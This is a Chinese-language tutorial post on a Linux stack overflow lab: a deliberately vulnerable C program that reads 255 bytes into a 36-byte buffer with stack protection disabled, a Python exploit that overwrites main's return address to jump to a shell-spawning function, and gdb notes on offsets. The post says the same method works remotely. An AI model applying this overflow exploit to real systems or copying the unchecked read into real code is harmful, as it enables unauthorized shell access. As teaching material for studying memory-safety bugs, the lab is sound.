Linux环境下栈溢出实验(一) 改变程序流程


简介 :

栈溢出是由于C语言系列没有内置检查机制来确保复制到缓冲区的数据不得大于缓冲区的大小,因此当这个数据足够大的时候,将会溢出缓冲区的范围。当溢出缓冲区之后 , 如果继续写入数据就有可能将内存中的重要数据覆盖 , 对程序甚至系统造成严重的影响 。骇客也会利用栈溢出来进行权限的提升等等非法操作


环境 :

1. ubuntu 16.04 64位
2. gcc 4.85

视频演示 :

栈溢出实验(一) (在线观看)
栈溢出实验(一)[代码] (下载)


代码 :

hello.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// 栈溢出后执行的函数
void bingo(){
    system("/bin/sh"); // 调用 system 函数启动 /bin/sh 来获取 shell
}

int main(){
    char buffer[36] = {0}; // 定义 36 个字符(字节)长度的字符数组 , 并全部初始化为 0
    puts("Tell my why : ");
    /* 溢出漏洞产生的原因就是因为 read 函数并没有对 buffer 数组的范围进行检查 
     * 如果我们向标准输入流中输入了超出 buffer 范围 (36个字节) 的数据 , 那么写操作并不会停止 , 而是会继续向内存中写入数据 , 而这些数据就是由我们控制的
     * 我们知道 , buffer 数组是保存在内存中的栈段中的 , 而 main 函数的返回地址也是保存在栈段中的
     * 因此 , 我们只需要控制写入的数据 , 将 main 函数的返回地址覆盖
     * 这样 , 在主函数执行结束后 , 会 pop 栈中保存的主函数的返回地址 (事实上已经被我们写入的数据覆盖) 到 eip 寄存器中
     * cpu 就会不会认为程序已经结束 , 而是继续根据 eip 寄存器指向的内存取指令执行 , 这样我们就达到了可以任意控制程序流程的目的
     * 因此 , 我们为了能获取一个 shell , 我们需要将主函数的返回地址覆盖为 bingo 函数的地址
     * 然后程序继续执行之后遇到 return 0 就会直接跳转到 bingo 函数 , 从而运行 /bin/sh , 我们就可以得到目标主机的 shell
     * 由于时间关系 , 这里所有的操作都在本机进行 , 远程操作也是同样的道理 , 因此不再赘述
     */
    read(0, buffer, 0xFF); // 使用 read 函数将标准输入流中的数据复制到 buffer 字符数组
    printf("Good boy : %s\n", buffer); // 打印字符数组的长度
    return 0; // 主函数返回
}

Makefile

a.out:hello.c
    gcc -g -fno-stack-protector hello.c
clean:
    rm ./a.out

exploit.py

#!/usr/bin/env python
# encoding:utf-8

from zio import *

Io = zio("./a.out") # 打开本地文件
payload = (0x7fffffffdd88 - 0x7fffffffdd50) * 'A' # 首先将 buffer 和 main 返回地址之间的所有数据都填充成垃圾数据 , 其实是为了能覆盖到 main 的返回地址
payload = payload + l64(0x4005ed) # 将 main 的返回地址覆盖为 bingo 的地址
# 这里的 l64 函数可以将一个 16 进制数转换为 64 位机的内存地址
# 我们知道 64 位机的机器字长为 8 字节 , 因此就需要用 8 个字符来填充
# 16 位机的寄存器是 16 位数的 , 两个字节 , 64 位机相应就是 8 字节
# 其实 l64(0x4005ed) 函数就返回了这个字符串 : 
# "\xed\x05\x40\x00\x00\x00\x00\x00"
# 也可以直接手动写成上述字符串
# 现在开始写入数据
Io.write(payload)
# 写入之后应该执行 bingo 函数 也就是启动 /bin/sh
# 这个时候 , 我们就需要接管程序的输入输出
# 调用 interact() 这个函数来释放脚本对程序的控制
Io.interact()
# 现在脚本就编写完成了 , 测试一下吧

README.md

(gdb) 我们来整理一下这几个数据Quit
(gdb) 1. bingo 地址 : 0x4005edQuit
(gdb) 1. 偏移 : (main返回地址 - buffer首地址) = (0x7fffffffdd88 - 0x7fffffffdd50Quit
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,185评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,445评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,684评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,564评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,681评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,874评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,025评论 3 408
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,761评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,217评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,545评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,694评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,351评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,988评论 3 315
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,778评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,007评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,427评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,580评论 2 349

推荐阅读更多精彩内容